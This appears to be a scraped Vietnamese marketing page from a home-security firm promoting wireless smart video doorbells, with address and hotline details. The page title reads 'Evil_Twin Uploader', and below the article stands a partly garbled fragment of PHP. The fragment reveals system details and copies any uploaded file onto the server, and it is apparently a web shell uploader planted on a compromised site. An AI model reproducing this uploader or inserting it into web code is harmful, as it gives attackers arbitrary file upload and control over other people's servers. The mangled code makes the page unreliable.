Evil_Twin Uploader

Chuông hình thông minh không dây an toàn cho ngôi nhà

Các thiết bị thông minh tiện lợi đang được lắp đặt ngày càng nhiều khi giúp chất lượng cuộc sống được cải thiện. Chuông hình thông minh không dây với thiết kế vô cùng bắt mắt cùng nhiều tính năng hữu ích sẽ đảm bảo an toàn cho gia đình và người thân của bạn.

Chuông hình thông minh không dây đảm bảo an toàn tuyệt đối

Chuông hình thông minh không dây thường được lắp đặt ngay tại cửa ra vào, rất tiện lợi cũng như đảm bảo an toàn căn nhà. Việc lắp chuông cửa không dây có hình bạn hoàn toàn dễ dàng nhận biết được có người tới thăm thông qua tiếng chuông thông báo với mức âm lượng tùy chỉnh.

chuông hình thông minh không dây

Với hình ảnh hiển thị bên ngoài cửa rõ nét. Bạn sẽ nhìn được ai tới nhà mình và có quyền lựa chọn mở cửa hay không. Kể cả trường hợp bạn đi vắng và để con ở nhà 1 mình bạn càng yên tâm căn dặn con không mở cửa cho người lạ.

Chuông hình thông minh không dây có thiết kế hiện đại

Thiết kế của thiết bị thông minh ngày càng được đơn giản, màu sắc hài hoà hơn, đặc biệt loại chuông cửa có hình, phù hợp với mọi căn phòng, màu sắc khá trang nhã. Với những ngôi nhà như các khu chung cư tuy kiến trúc ngôi nhà không quá sang chảnh nhưng khi lắp chuông cửa không dây có hình cũng thể hiện phần nào sự khác biệt cho căn nhà. Với nhưng ngôi nhà được thiết kế với kiến trúc sâu, kín cổng cao tường thì chiếc chuông cửa có hình lại càng cần thiết. Tuy vấn đề đảm bảo an toàn được ưu tiên hàng đầu nhưng đồng thời cũng phải hài hoà với không gian ngôi nhà, tạo điểm nhấn bắt mắt hơn.

chuông hình thông minh không dây

Lắp đặt chuông hình thông minh không dây dễ dàng

Việc lắp đặt chuông cửa thông minh không dây rất nhanh chóng mà không cần phải đục tường đi dây rắc rối. Phần mất thời gian nhất có chăng chỉ là lắp màn hình kết nối với mắt camera bên ngoài cổng.

>> Đèn chống trộm hồng ngoại – Tăng cường an ninh cho ngôi nhà của bạn

>> 6 điều bạn cần biết khi lắp đặt và chọn mua camera quan sát

Trao đổi, nói chuyện với khách qua chuông cửa có hình không dây

Tính năng nổi bật của chuông hình thông minh không dây là khả năng nhìn thấy và nói chuyện được với người bên ngoài cửa mà không cần phải trực tiếp ra mở cửa thông qua mắt camera và màn hình nhỏ được lắp đặt ở trong nhà. Chất lượng của hình ảnh nhìn qua màn hình vô cùng rõ nét, bạn có thể hỏi xem ai tới nhà mình. Việc trao đổi qua màn hình chính là điể khác biệt của chuông cửa màn hình, bạn có thể sử dụng như một thiết bị thông minh tăng độ an toàn cho ngôi nhà.

Để tìm hiểu thêm những tính năng tuyệt vời và mức giá của sản phẩm chuông hình thông minh không dây, quý khách có thể với HomeSecurity qua địa chỉ:

Đ/c: LK 6-9, Khu Nhà ở Ngô Thì Nhậm, Phường Hà Cầu , Q. Hà Đông, TP. HN

Email: contact@homesecurity.com.vn

Hotline: 024.6688.7518 – 0963.493.586

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial